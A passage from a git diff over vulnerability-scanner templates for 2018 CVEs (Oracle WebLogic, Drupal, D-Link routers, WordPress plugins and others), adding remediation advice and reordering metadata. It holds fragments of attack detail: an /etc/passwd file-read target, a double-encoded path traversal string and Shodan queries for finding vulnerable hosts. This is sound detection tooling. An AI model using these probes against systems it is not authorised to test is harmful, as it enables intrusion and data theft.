https://launchpad.support.sap.com/#/notes/2525222 - https://blogs.sap.com/2018/02/13/sap-security-patch-day-february-2018/ @@ -19,8 +21,8 @@ info: cve-id: CVE-2018-2392 cwe-id: CWE-611 epss-score: 0.0032 - cpe: cpe:2.3:a:sap:internet_graphics_server:7.20:*:*:*:*:*:*:* epss-percentile: 0.66795 + cpe: cpe:2.3:a:sap:internet_graphics_server:7.20:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sap @@ -94,4 +96,4 @@ http: status: - 200 -# file name - /etc/passwd +# file name - /etc/passwd \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index 4be9569149..b7b9fac828 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -5,6 +5,8 @@ info: author: madrobot,leovalcante severity: high description: The Oracle WebCenter Sites component of Oracle Fusion Middleware is susceptible to multiple instances of cross-site scripting that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebCenter Sites. Impacted versions that are affected are 11.1.1.8.0, 12.2.1.2.0 and 12.2.1.3.0. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebCenter Sites, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data. + remediation: | + Apply the latest security patches provided by Oracle to address this vulnerability. reference: - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html - http://web.archive.org/web/20211206165005/https://securitytracker.com/id/1040695 @@ -16,8 +18,8 @@ info: cvss-score: 8.2 cve-id: CVE-2018-2791 epss-score: 0.03569 - cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* epss-percentile: 0.90407 + cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index a511b9af15..e08a3145a0 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services) is susceptible to a remote code execution vulnerability that is easily exploitable and could allow unauthenticated attackers with network access via HTTP to compromise the server. Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. + remediation: | + Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: - https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ - https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894 @@ -17,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2018-2894 epss-score: 0.9734 - cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* epss-percentile: 0.99824 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 3 vendor: oracle diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index 9259eeaac9..155180cdf3 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Oracle E-Business Suite, Application Management Pack component (User Monitoring subcomponent), is susceptible to blind server-side request forgery. An attacker with network access via HTTP can gain read access to a subset of data, connect to internal services like HTTP-enabled databases, or perform post requests towards internal services which are not intended to be exposed. Affected supported versions are 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6, and 12.2.7. + remediation: | + Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html - http://web.archive.org/web/20211206102649/https://securitytracker.com/id/1041897 @@ -16,13 +18,13 @@ info: cvss-score: 5.3 cve-id: CVE-2018-3167 epss-score: 0.01454 - cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:* epss-percentile: 0.85018 + cpe: cpe:2.3:a:oracle:application_management_pack:12.1.3:*:*:*:*:e-business_suite:*:* metadata: max-request: 1 - framework: e-business_suite vendor: oracle product: application_management_pack + framework: e-business_suite tags: cve,cve2018,oracle,ebs,ssrf,blind http: diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index fd2f039960..08a4134021 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -5,6 +5,8 @@ info: author: leovalcante severity: medium description: The Oracle WebCenter Sites 11.1.1.8.0 component of Oracle Fusion Middleware is impacted by easily exploitable cross-site scripting vulnerabilities that allow high privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. + remediation: | + Apply the latest patches and updates provided by Oracle to mitigate this vulnerability. reference: - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites - https://www.oracle.com/security-alerts/cpuoct2018.html @@ -15,8 +17,8 @@ info: cvss-score: 6.9 cve-id: CVE-2018-3238 epss-score: 0.00332 - cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* epss-percentile: 0.67419 + cpe: cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* metadata: max-request: 3 vendor: oracle diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml index 292f62f1a6..a3998b8bfb 100644 --- a/http/cves/2018/CVE-2018-3714.yaml +++ b/http/cves/2018/CVE-2018-3714.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: node-srv is vulnerable to local file inclusion due to lack of url validation, which allows a malicious user to read content of any file with known path. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the node-srv application. reference: - https://hackerone.com/reports/309124 - https://nvd.nist.gov/vuln/detail/CVE-2018-3714 @@ -14,13 +16,13 @@ info: cve-id: CVE-2018-3714 cwe-id: CWE-22 epss-score: 0.00364 - cpe: cpe:2.3:a:node-srv_project:node-srv:*:*:*:*:*:node.js:*:* epss-percentile: 0.68884 + cpe: cpe:2.3:a:node-srv_project:node-srv:*:*:*:*:*:node.js:*:* metadata: max-request: 1 - framework: node.js vendor: node-srv_project product: node-srv + framework: node.js tags: cve,cve2018,nodejs,lfi,hackerone http: diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml index 909f4e89e0..364fd0adf1 100644 --- a/http/cves/2018/CVE-2018-3760.yaml +++ b/http/cves/2018/CVE-2018-3760.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Ruby On Rails is vulnerable to local file inclusion caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. + remediation: | + Apply the latest security patches and updates for Ruby On Rails framework to fix the Local File Inclusion vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760 - https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf @@ -18,8 +20,8 @@ info: cve-id: CVE-2018-3760 cwe-id: CWE-200,CWE-22 epss-score: 0.05013 - cpe: cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:* epss-percentile: 0.91853 + cpe: cpe:2.3:a:redhat:cloudforms:4.5:*:*:*:*:*:*:* metadata: max-request: 2 vendor: redhat diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml index 02428449e6..6015f58d35 100644 --- a/http/cves/2018/CVE-2018-3810.yaml +++ b/http/cves/2018/CVE-2018-3810.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code. + remediation: | + Update to the latest version of the Oturia WordPress Smart Google Code Inserter plugin (3.5 or higher) to fix the authentication bypass vulnerability. reference: - https://www.exploit-db.com/exploits/43420 - https://nvd.nist.gov/vuln/detail/CVE-2018-3810 @@ -17,13 +19,13 @@ info: cve-id: CVE-2018-3810 cwe-id: CWE-287 epss-score: 0.8409 - cpe: cpe:2.3:a:oturia:smart_google_code_inserter:*:*:*:*:*:wordpress:*:* epss-percentile: 0.9803 + cpe: cpe:2.3:a:oturia:smart_google_code_inserter:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: oturia product: smart_google_code_inserter + framework: wordpress tags: wordpress,cve,cve2018,google,edb http: diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 508be2f986..0b1fb91c96 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Atlassian Jira Confluence before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4, and from version 7.9.0 before version 7.9.2, allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the error message of custom fields when an invalid value is specified. + remediation: | + Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability. reference: - https://jira.atlassian.com/browse/JRASERVER-67289 - https://nvd.nist.gov/vuln/detail/CVE-2018-5230 @@ -15,13 +17,13 @@ info: cve-id: CVE-2018-5230 cwe-id: CWE-79 epss-score: 0.00211 - cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* epss-percentile: 0.58311 + cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"Atlassian Confluence" vendor: atlassian product: jira + shodan-query: http.component:"Atlassian Confluence" tags: cve,cve2018,atlassian,confluence,xss http: diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index 880d80e11d..cb532547f1 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Grav CMS before 1.3.0 is vulnerable to cross-site scripting via system/src/Grav/Common/Twig/Twig.php and allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. + remediation: | + Upgrade Grav CMS to version 1.3.0 or later, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://sysdream.com/news/lab/2018-03-15-cve-2018-5233-grav-cms-admin-plugin-reflected-cross-site-scripting-xss-vulnerability/ - http://www.openwall.com/lists/oss-security/2018/03/15/1 @@ -16,13 +18,13 @@ info: cve-id: CVE-2018-5233 cwe-id: CWE-79 epss-score: 0.00295 - cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:* epss-percentile: 0.65386 + cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: html:"Grav CMS" vendor: getgrav product: grav_cms + shodan-query: html:"Grav CMS" tags: cve,cve2018,xss,grav http: diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml index 7287513a41..7cd3557aab 100644 --- a/http/cves/2018/CVE-2018-5316.yaml +++ b/http/cves/2018/CVE-2018-5316.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress SagePay Server Gateway for WooCommerce before 1.0.9 is vulnerable to cross-site scripting via the includes/pages/redirect.php page parameter. + remediation: | + Update to the latest version of the WordPress SagePay Server Gateway for WooCommerce plugin (1.0.9 or higher) to mitigate this vulnerability. reference: - https://wordpress.org/support/topic/sagepay-server-gateway-for-woocommerce-1-0-7-cross-site-scripting/#post-9792337 - https://wordpress.org/plugins/sagepay-server-gateway-for-woocommerce/#developers @@ -16,14 +18,14 @@ info: cve-id: CVE-2018-5316 cwe-id: CWE-79 epss-score: 0.00175 - cpe: cpe:2.3:a:patsatech:sagepay_server_gateway_for_woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.53966 + cpe: cpe:2.3:a:patsatech:sagepay_server_gateway_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: patsatech product: sagepay_server_gateway_for_woocommerce + framework: wordpress tags: cve2018,wordpress,xss,wp-plugin,wp,woocommerce,packetstorm,cve http: diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index cf425d264f..4838050190 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable). + remediation: | + Upgrade to a patched version of SugarCRM or apply the necessary security patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/43683 - https://m4k4br0.github.io/sugarcrm-xss/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2018-5715 cwe-id: CWE-79 epss-score: 0.00129 - cpe: cpe:2.3:a:sugarcrm:sugarcrm:3.5.1:*:*:*:*:*:*:* epss-percentile: 0.46905 + cpe: cpe:2.3:a:sugarcrm:sugarcrm:3.5.1:*:*:*:*:*:*:* metadata: max-request: 1 - google-query: intext:"SugarCRM Inc. All Rights Reserved" - shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" vendor: sugarcrm product: sugarcrm + shodan-query: http.html:"SugarCRM Inc. All Rights Reserved" + google-query: intext:"SugarCRM Inc. All Rights Reserved" tags: sugarcrm,xss,edb,cve,cve2018 http: diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index 469f68fb44..3ebfdbd1d3 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter. + remediation: | + Update Joomla! Jtag Members Directory to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/43913 - https://packetstormsecurity.com/files/146137/Joomla-Jtag-Members-Directory-5.3.7-Arbitrary-File-Download.html @@ -15,13 +17,13 @@ info: cve-id: CVE-2018-6008 cwe-id: CWE-200 epss-score: 0.41482 - cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:* epss-percentile: 0.96813 + cpe: cpe:2.3:a:joomlatag:jtag_members_directory:5.3.7:*:*:*:*:joomla\!:*:* metadata: max-request: 1 - framework: joomla\! vendor: joomlatag product: jtag_members_directory + framework: joomla\! tags: cve,cve2018,joomla,lfi,edb,packetstorm http: diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 4a005c7c1b..51685d4f02 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade to the latest version of Zeit Next.js (>=4.2.3) to mitigate this vulnerability. reference: - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/NextFrameworkPathTraversal.java - https://github.com/zeit/next.js/releases/tag/4.2.3 @@ -16,13 +18,13 @@ info: cve-id: CVE-2018-6184 cwe-id: CWE-22 epss-score: 0.00396 - cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:* epss-percentile: 0.70146 + cpe: cpe:2.3:a:zeit:next.js:4.0.0:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: html:"/_next/static" vendor: zeit product: next.js + shodan-query: html:"/_next/static" tags: cve,cve2018,nextjs,lfi,traversal http: diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index a319400f37..7202a33a02 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches and updates provided by vBulletin to fix the open redirect vulnerability. reference: - https://cxsecurity.com/issue/WLB-2018010251 - https://nvd.nist.gov/vuln/detail/CVE-2018-6200 @@ -15,11 +17,11 @@ info: cve-id: CVE-2018-6200 cwe-id: CWE-601 epss-score: 0.00118 - cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* epss-percentile: 0.45103 + cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: vbulletin product: vbulletin tags: cve,cve2018,redirect,vbulletin diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index c03239d6c2..a7cc520681 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter. + remediation: | + Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-6530 - https://github.com/soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto @@ -18,8 +20,8 @@ info: cve-id: CVE-2018-6530 cwe-id: CWE-78 epss-score: 0.94099 - cpe: cpe:2.3:o:d-link:dir-860l_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.98828 + cpe: cpe:2.3:o:d-link:dir-860l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: d-link diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 2aa22de0f2..920a4ac028 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php + remediation: | + Apply the latest patch or upgrade to a newer version of DedeCMS to fix the path disclosure vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2018-6910 - https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.md @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-6910 cwe-id: CWE-668 epss-score: 0.03367 - cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* epss-percentile: 0.90157 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dedecms diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index bbc1fac9f7..ffcde7f0b8 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred. + remediation: | + Upgrade to the latest version of Anchor CMS or apply the necessary patches to fix the error log exposure vulnerability. reference: - https://github.com/anchorcms/anchor-cms/issues/1247 - https://twitter.com/finnwea/status/965279233030393856 @@ -18,8 +20,8 @@ info: cve-id: CVE-2018-7251 cwe-id: CWE-200 epss-score: 0.06473 - cpe: cpe:2.3:a:anchorcms:anchor:0.12.3:*:*:*:*:*:*:* epss-percentile: 0.92792 + cpe: cpe:2.3:a:anchorcms:anchor:0.12.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: anchorcms diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index 1fa86fc2fa..c102ed681b 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. + remediation: | + Update WordPress Site Editor plugin to the latest version to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/44340 - http://seclists.org/fulldisclosure/2018/Mar/40 @@ -17,13 +19,13 @@ info: cve-id: CVE-2018-7422 cwe-id: CWE-22 epss-score: 0.95295 - cpe: cpe:2.3:a:siteeditor:site_editor:*:*:*:*:*:wordpress:*:* epss-percentile: 0.99068 + cpe: cpe:2.3:a:siteeditor:site_editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: siteeditor product: site_editor + framework: wordpress tags: cve,cve2018,wordpress,wp-plugin,lfi,edb,seclists http: diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index cfd937634e..b48bb98918 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: AxxonSoft Axxon Next suffers from a local file inclusion vulnerability. + remediation: | + Apply the latest security patches or updates provided by AxxonSoft to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html - https://github.com/sullo/advisory-archives/blob/master/axxonsoft-next-CVE-2018-7467.txt @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-7467 cwe-id: CWE-22 epss-score: 0.00396 - cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:* epss-percentile: 0.70146 + cpe: cpe:2.3:a:axxonsoft:next:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: axxonsoft diff --git a/http/cves/2018/CVE-2018-7490.yaml b/http/cves/2018/CVE-2018-7490.yaml index 61dc578f76..cdd2ec627d 100644 --- a/http/cves/2018/CVE-2018-7490.yaml +++ b/http/cves/2018/CVE-2018-7490.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion. + remediation: | + Update to the latest version of uWSGI PHP Plugin or apply the necessary patches to fix the local file inclusion vulnerability. reference: - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html - https://www.exploit-db.com/exploits/44223/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2018-7490 cwe-id: CWE-22 epss-score: 0.9656 - cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:* epss-percentile: 0.99436 + cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: unbit diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index c9a9f3184e..5b9652b300 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. + remediation: | + Upgrade to the latest version of Drupal or apply the official patch provided by Drupal security team. reference: - https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 - https://nvd.nist.gov/vuln/detail/CVE-2018-7600 @@ -17,13 +19,13 @@ info: cve-id: CVE-2018-7600 cwe-id: CWE-20 epss-score: 0.97553 - cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* epss-percentile: 0.99994 + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.component:"drupal" vendor: drupal product: drupal + shodan-query: http.component:"drupal" tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive http: diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index a7e9233e51..719a62f934 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. + remediation: | + Upgrade to Drupal 7.58, 8.3.9, 8.4.6, or 8.5.1 or apply the necessary patches provided by Drupal. reference: - https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py - https://nvd.nist.gov/vuln/detail/CVE-2018-7602 @@ -16,13 +18,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-7602 epss-score: 0.97471 - cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* epss-percentile: 0.99942 + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* metadata: max-request: 4 - shodan-query: http.component:"drupal" vendor: drupal product: drupal + shodan-query: http.component:"drupal" tags: cve2018,drupal,authenticated,kev,vulhub,edb,cve http: diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 92e74e1589..3df5928ba7 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: medium description: In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter. + remediation: | + To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://packetstormsecurity.com/files/147065/YzmCMS-3.6-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2018-7653 @@ -15,14 +17,14 @@ info: cve-id: CVE-2018-7653 cwe-id: CWE-79 epss-score: 0.00797 - cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:* epss-percentile: 0.79437 + cpe: cpe:2.3:a:yzmcms:yzmcms:3.6:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: title="YzmCMS" - shodan-query: title:"YzmCMS" vendor: yzmcms product: yzmcms + shodan-query: title:"YzmCMS" + fofa-query: title="YzmCMS" tags: packetstorm,cve,cve2018,yzmcms,cms,xss http: diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index 5251c442d2..d48712c65a 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: medium description: CouchCMS <= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php. + remediation: | + Upgrade to the latest version of CouchCMS (2.1 or higher) to mitigate this vulnerability. reference: - https://github.com/CouchCMS/CouchCMS/issues/46 - https://nvd.nist.gov/vuln/detail/CVE-2018-7662 @@ -14,8 +16,8 @@ info: cve-id: CVE-2018-7662 cwe-id: CWE-200 epss-score: 0.00286 - cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:* epss-percentile: 0.64709 + cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: couchcms diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index 6a792813d7..7404528811 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -6,6 +6,8 @@ info: severity: high description: | DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code. + remediation: | + Apply the latest security patches and update to a newer version of DedeCMS. reference: - https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ - https://nvd.nist.gov/vuln/detail/CVE-2018-7700 @@ -15,8 +17,8 @@ info: cve-id: CVE-2018-7700 cwe-id: CWE-352 epss-score: 0.73235 - cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* epss-percentile: 0.97671 + cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dedecms diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml index 8284e89463..1f965478a7 100644 --- 